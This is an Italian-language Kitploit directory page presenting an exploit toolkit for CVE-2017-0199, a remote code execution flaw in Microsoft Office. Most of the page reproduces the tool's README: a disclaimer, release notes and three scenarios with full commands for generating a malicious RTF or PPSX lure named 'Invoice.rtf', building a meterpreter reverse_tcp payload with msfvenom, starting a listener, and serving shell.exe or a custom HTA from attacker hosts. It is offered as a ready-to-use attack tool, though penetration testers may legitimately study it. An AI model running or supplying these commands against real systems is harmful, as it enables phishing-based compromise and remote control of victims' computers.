Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v4.0 è un pratico script Python che fornisce a pentester e ricercatori di sicurezza un modo rapido ed efficace per testare la RCE di Microsoft Office. Può generare un file RTF/PPSX dannoso e consegnare payload metasploit / meterpreter / altri alla vittima senza alcuna configurazione complessa. | Kitploit
Strumenti/GitHubGitHub/bhdresh/cve-2017-0199
Generazione di PayloadExploitSfruttamento di Applicazioni WebAnalisi MalwarePenetration TestingApprendimento e Formazione
GitHubbhdresh/cve-2017-0199

CVE-2017-0199

Vedi Repository
7242568 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Exploit toolkit CVE-2017-0199 - v4.0 è un pratico script Python che fornisce a pentester e ricercatori di sicurezza un modo rapido ed efficace per testare la RCE di Microsoft Office. Può generare un file RTF/PPSX dannoso e consegnare payload metasploit / meterpreter / altri alla vittima senza alcuna configurazione complessa.

Condividi

Toolkit di exploit CVE-2017-0199 - v4.0

Il toolkit di exploit CVE-2017-0199 - v4.0 è un comodo script Python che fornisce a penetration tester e ricercatori di sicurezza un modo rapido ed efficace per testare RCE di Microsoft Office. Può generare un file RTF/PPSX malevolo e consegnare metasploit / meterpreter / altri payload alla vittima senza alcuna configurazione complessa.

Avvertenze

Questo programma è SOLO a scopo educativo. Non utilizzarlo senza autorizzazione. Si applica la consueta clausola di esclusione di responsabilità, in particolare il fatto che io (bhdresh) non sono responsabile per eventuali danni causati dall'uso diretto o indiretto delle informazioni o funzionalità fornite da questi programmi. L'autore o qualsiasi fornitore di servizi Internet NON si assume alcuna responsabilità per il contenuto o l'uso improprio di questi programmi o di loro derivati. Utilizzando questo programma accetti il fatto che eventuali danni (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causati dall'uso di questi programmi non sono di responsabilità di bhdresh.

Infine, questo è uno sviluppo personale, per favore rispettane la filosofia e non usarlo per scopi malvagi!

Licenza

CC BY 4.0 licenza - https://creativecommons.org/licenses/by/4.0/

Note di rilascio:

Introdotte le seguenti capacità nello script

root@kitploit:~
- Generare file PPSX malevolo
- Modalità di sfruttamento per file PPSX generato
- Template.ppsx aggiornato

Versione: Python versione 2.7.13

Scenario 1: Consegnare payload locale

Comandi di esempio
root@kitploit:~
1) Genera il file RTF malevolo
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Opzionale, se si utilizza Payload MSF): Genera payload metasploit e avvia handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Avvia il toolkit in modalità exploit per consegnare payload locale
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Diagramma di sequenza

alt tag

Scenario 2: Consegnare payload remoto

Comandi di esempio
root@kitploit:~
1) Genera il file RTF malevolo
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Avvia il toolkit in modalità exploit per consegnare payload remoto
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Diagramma di sequenza

alt tag

Scenario 3: Consegnare file HTA personalizzato

Comandi di esempio
root@kitploit:~
1) Genera il file RTF malevolo
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Avvia il toolkit in modalità exploit per consegnare file HTA personalizzato
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Diagramma di sequenza

alt tag

Argomenti della riga di comando:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Questo è un comodo toolkit per sfruttare CVE-2017-0199 (RCE di Microsoft Office)

Modalità:

-M gen                                          Genera solo file malevolo

     Genera file RTF/PPSX malevolo:

      -w <Filename.rtf/Filename.ppsx>     Nome del file RTF/PPSX malevolo (Condividi questo file con la vittima).

      -u <http://attacker.com/test.hta>   Il percorso di un file HTA/SCT. Normalmente, dovrebbe essere un dominio o IP dove questo
                                      tool è in esecuzione.
                                      Ad esempio, http://attackerip.com/test.doc (Questo URL sarà incluso nel file RTF/PPSX
                                      malevolo e verrà richiesto una volta che la vittima aprirà il file RTF malevolo).
      -t RTF|PPSX (predefinito = RTF)         Tipo di file da generare.
      -x 0|1  (predefinito = 0)               Genera file RTF offuscato. 0 = Disabilita, 1 = Abilita.

				      
-M exp                                          Avvia modalità exploit

     Sfruttamento:
 
      -t RTF|PPSX (predefinito = RTF)         Tipo di file da sfruttare.
      -H </tmp/custom>                Percorso locale di un file HTA/SCT personalizzato da consegnare ed eseguire sul target.
                                          NOTA: Questa opzione non consegnerà i payload specificati tramite le opzioni "-e" e "-l"
					  
      -p <TCP port:Default 80>            Numero di porta locale.

      -e <http://attacker.com/shell.exe>  Il percorso di un file eseguibile / shell meterpreter / payload che deve essere eseguito sul target.

      -l </tmp/shell.exe>                 Se il payload è ospitato localmente, specifica il percorso locale di un file eseguibile / shell meterpreter / payload.

Crediti

@nixawk per il campione RTF, @Li Haifei, @bhdresh

Bug, problemi, richieste di funzionalità

Ovviamente non sono uno sviluppatore a tempo pieno, quindi aspettati qualche intoppo.

Segnala bug, problemi tramite https://github.com/bhdresh/CVE-2017-0199/issues/new

Scarica lo strumento